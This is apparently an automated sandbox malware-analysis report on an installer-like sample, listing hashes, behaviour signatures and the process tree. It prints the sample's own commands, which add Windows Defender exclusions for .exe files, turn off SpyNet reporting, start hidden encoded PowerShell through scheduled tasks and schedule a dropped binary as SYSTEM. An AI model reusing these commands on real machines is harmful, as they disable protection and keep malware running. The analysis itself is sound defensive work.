Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
113s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
11/10/2022, 22:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
0a67e5994e4ba1e3bc213cd3d9e036d1
-
SHA1
8c9d757d853136824faac683d6aafdbd67b03dc6
-
SHA256
da2f00084624a3a86c88bdaa856548709baa5843916d8c9781d3f68a0070ba19
-
SHA512
35a7131091dbceea1683d416cbb67585d4576ff81092b39adf1588e0953f2fcd6e108509e066f8ed765b4bb504be9bb60b07f5254e3baaf20089c2b3d78f2282
-
SSDEEP
196608:91O+zXFS3RnVAAMNMK+KoNdbb8HAd2PGg:3O+woAMNmP8Htz
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1384 Install.exe 1140 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 1240 file.exe 1384 Install.exe 1384 Install.exe 1384 Install.exe 1384 Install.exe 1140 Install.exe 1140 Install.exe 1140 Install.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bKwcWZekAnYWEgmozo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 392 schtasks.exe 1224 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 540 powershell.EXE 540 powershell.EXE 540 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 540 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1240 wrote to memory of 1384 1240 file.exe 27 PID 1240 wrote to memory of 1384 1240 file.exe 27 PID 1240 wrote to memory of 1384 1240 file.exe 27 PID 1240 wrote to memory of 1384 1240 file.exe 27 PID 1240 wrote to memory of 1384 1240 file.exe 27 PID 1240 wrote to memory of 1384 1240 file.exe 27 PID 1240 wrote to memory of 1384 1240 file.exe 27 PID 1384 wrote to memory of 1140 1384 Install.exe 28 PID 1384 wrote to memory of 1140 1384 Install.exe 28 PID 1384 wrote to memory of 1140 1384 Install.exe 28 PID 1384 wrote to memory of 1140 1384 Install.exe 28 PID 1384 wrote to memory of 1140 1384 Install.exe 28 PID 1384 wrote to memory of 1140 1384 Install.exe 28 PID 1384 wrote to memory of 1140 1384 Install.exe 28 PID 1140 wrote to memory of 272 1140 Install.exe 30 PID 1140 wrote to memory of 272 1140 Install.exe 30 PID 1140 wrote to memory of 272 1140 Install.exe 30 PID 1140 wrote to memory of 272 1140 Install.exe 30 PID 1140 wrote to memory of 272 1140 Install.exe 30 PID 1140 wrote to memory of 272 1140 Install.exe 30 PID 1140 wrote to memory of 272 1140 Install.exe 30 PID 1140 wrote to memory of 1032 1140 Install.exe 32 PID 1140 wrote to memory of 1032 1140 Install.exe 32 PID 1140 wrote to memory of 1032 1140 Install.exe 32 PID 1140 wrote to memory of 1032 1140 Install.exe 32 PID 1140 wrote to memory of 1032 1140 Install.exe 32 PID 1140 wrote to memory of 1032 1140 Install.exe 32 PID 1140 wrote to memory of 1032 1140 Install.exe 32 PID 272 wrote to memory of 856 272 forfiles.exe 33 PID 272 wrote to memory of 856 272 forfiles.exe 33 PID 272 wrote to memory of 856 272 forfiles.exe 33 PID 272 wrote to memory of 856 272 forfiles.exe 33 PID 272 wrote to memory of 856 272 forfiles.exe 33 PID 272 wrote to memory of 856 272 forfiles.exe 33 PID 272 wrote to memory of 856 272 forfiles.exe 33 PID 1032 wrote to memory of 1168 1032 forfiles.exe 35 PID 1032 wrote to memory of 1168 1032 forfiles.exe 35 PID 1032 wrote to memory of 1168 1032 forfiles.exe 35 PID 1032 wrote to memory of 1168 1032 forfiles.exe 35 PID 1032 wrote to memory of 1168 1032 forfiles.exe 35 PID 1032 wrote to memory of 1168 1032 forfiles.exe 35 PID 1032 wrote to memory of 1168 1032 forfiles.exe 35 PID 856 wrote to memory of 1956 856 cmd.exe 37 PID 856 wrote to memory of 1956 856 cmd.exe 37 PID 856 wrote to memory of 1956 856 cmd.exe 37 PID 856 wrote to memory of 1956 856 cmd.exe 37 PID 856 wrote to memory of 1956 856 cmd.exe 37 PID 856 wrote to memory of 1956 856 cmd.exe 37 PID 856 wrote to memory of 1956 856 cmd.exe 37 PID 1168 wrote to memory of 1744 1168 cmd.exe 36 PID 1168 wrote to memory of 1744 1168 cmd.exe 36 PID 1168 wrote to memory of 1744 1168 cmd.exe 36 PID 1168 wrote to memory of 1744 1168 cmd.exe 36 PID 1168 wrote to memory of 1744 1168 cmd.exe 36 PID 1168 wrote to memory of 1744 1168 cmd.exe 36 PID 1168 wrote to memory of 1744 1168 cmd.exe 36 PID 1168 wrote to memory of 1176 1168 cmd.exe 38 PID 1168 wrote to memory of 1176 1168 cmd.exe 38 PID 1168 wrote to memory of 1176 1168 cmd.exe 38 PID 1168 wrote to memory of 1176 1168 cmd.exe 38 PID 1168 wrote to memory of 1176 1168 cmd.exe 38 PID 1168 wrote to memory of 1176 1168 cmd.exe 38 PID 1168 wrote to memory of 1176 1168 cmd.exe 38 PID 856 wrote to memory of 1752 856 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\7zS8E0D.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\7zS935B.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:856 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1956
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1752
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1744
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1176
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTDbjkyfN" /SC once /ST 00:02:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTDbjkyfN"4⤵PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTDbjkyfN"4⤵PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 00:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\XFqLRTd.exe\" q8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1224
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D96ED97A-3B9B-4865-97E9-8D6B8DAFA6AC} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵PID:1076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1980
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1620
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5d2c5c8905f5189ef3d39887e98ed492e
SHA191b5fa3f9d63bd51ca31084b1faf6af3e23511ce
SHA2560cb7987d8f5b9907b72fa7abe757b7778e3e2fd699aaeb52e04bd761f854065a
SHA512f28f7350bf69c6fe6d0df2fbdf515cb6377f46a5f04d0d4ec15391dddd68e5f8867d10799c7fbb01fa1043b62ebe21a9979121172103c3c7b1792f3c549c34b5
-
Filesize
6.3MB
MD5d2c5c8905f5189ef3d39887e98ed492e
SHA191b5fa3f9d63bd51ca31084b1faf6af3e23511ce
SHA2560cb7987d8f5b9907b72fa7abe757b7778e3e2fd699aaeb52e04bd761f854065a
SHA512f28f7350bf69c6fe6d0df2fbdf515cb6377f46a5f04d0d4ec15391dddd68e5f8867d10799c7fbb01fa1043b62ebe21a9979121172103c3c7b1792f3c549c34b5
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.3MB
MD5d2c5c8905f5189ef3d39887e98ed492e
SHA191b5fa3f9d63bd51ca31084b1faf6af3e23511ce
SHA2560cb7987d8f5b9907b72fa7abe757b7778e3e2fd699aaeb52e04bd761f854065a
SHA512f28f7350bf69c6fe6d0df2fbdf515cb6377f46a5f04d0d4ec15391dddd68e5f8867d10799c7fbb01fa1043b62ebe21a9979121172103c3c7b1792f3c549c34b5
-
Filesize
6.3MB
MD5d2c5c8905f5189ef3d39887e98ed492e
SHA191b5fa3f9d63bd51ca31084b1faf6af3e23511ce
SHA2560cb7987d8f5b9907b72fa7abe757b7778e3e2fd699aaeb52e04bd761f854065a
SHA512f28f7350bf69c6fe6d0df2fbdf515cb6377f46a5f04d0d4ec15391dddd68e5f8867d10799c7fbb01fa1043b62ebe21a9979121172103c3c7b1792f3c549c34b5
-
Filesize
6.3MB
MD5d2c5c8905f5189ef3d39887e98ed492e
SHA191b5fa3f9d63bd51ca31084b1faf6af3e23511ce
SHA2560cb7987d8f5b9907b72fa7abe757b7778e3e2fd699aaeb52e04bd761f854065a
SHA512f28f7350bf69c6fe6d0df2fbdf515cb6377f46a5f04d0d4ec15391dddd68e5f8867d10799c7fbb01fa1043b62ebe21a9979121172103c3c7b1792f3c549c34b5
-
Filesize
6.3MB
MD5d2c5c8905f5189ef3d39887e98ed492e
SHA191b5fa3f9d63bd51ca31084b1faf6af3e23511ce
SHA2560cb7987d8f5b9907b72fa7abe757b7778e3e2fd699aaeb52e04bd761f854065a
SHA512f28f7350bf69c6fe6d0df2fbdf515cb6377f46a5f04d0d4ec15391dddd68e5f8867d10799c7fbb01fa1043b62ebe21a9979121172103c3c7b1792f3c549c34b5
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269